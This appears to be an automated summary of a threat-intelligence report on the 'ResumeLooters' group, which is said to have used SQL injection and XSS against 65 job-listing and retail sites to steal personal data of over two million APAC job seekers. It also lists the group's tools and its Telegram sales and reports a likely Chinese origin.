February 6, 2024 at 10:11AM
The ‘ResumeLooters’ threat group has compromised 65 job listing and retail sites using SQL injection and XSS attacks, stealing personal data from over two million job seekers primarily in the APAC region. They employ various tools for penetration testing, such as SQLmap and Acunetix, to exploit security weaknesses and inject malicious scripts into websites to extract data for financial gain. Group-IB discovered the attackers’ attempts to sell the stolen data and link their activities to China.
After analyzing the meeting notes, the key takeaways are as follows:
– A threat group named ‘ResumeLooters’ has stolen personal data of over two million job seekers by compromising 65 legitimate job listing and retail sites.
– The group predominantly targets the APAC region, focusing on sites in Australia, Taiwan, China, Thailand, India, and Vietnam.
– Their methods include employing SQL injection and cross-site scripting (XSS) attacks to breach targeted sites, primarily job-seeking and retail shops.
– Group-IB has been monitoring ‘ResumeLooters’ since its inception and observed the group attempting to sell the stolen data through Telegram channels.
– The attackers have made use of open-source tools such as SQLmap, Acunetix, Beef Framework, X-Ray, Metasploit, ARL, and Dirsearch during their pen-testing phase.
– ‘ResumeLooters’ injects malicious scripts into various locations on a website’s HTML to steal visitors’ information, and they have also employed custom attack techniques, such as creating fake employer profiles and posting fake CV documents containing XSS scripts.
– Group-IB was able to infiltrate the database hosting the stolen data, revealing that the attackers managed to establish administrator access on some of the compromised sites.
– The group’s primary motive is financial gain, as they attempt to sell the stolen data to other cybercriminals via Telegram accounts with Chinese names.
– While the attackers’ origin is not explicitly confirmed, the fact that they sell stolen data in Chinese-speaking groups and use Chinese versions of tools makes it highly probable that they are from China.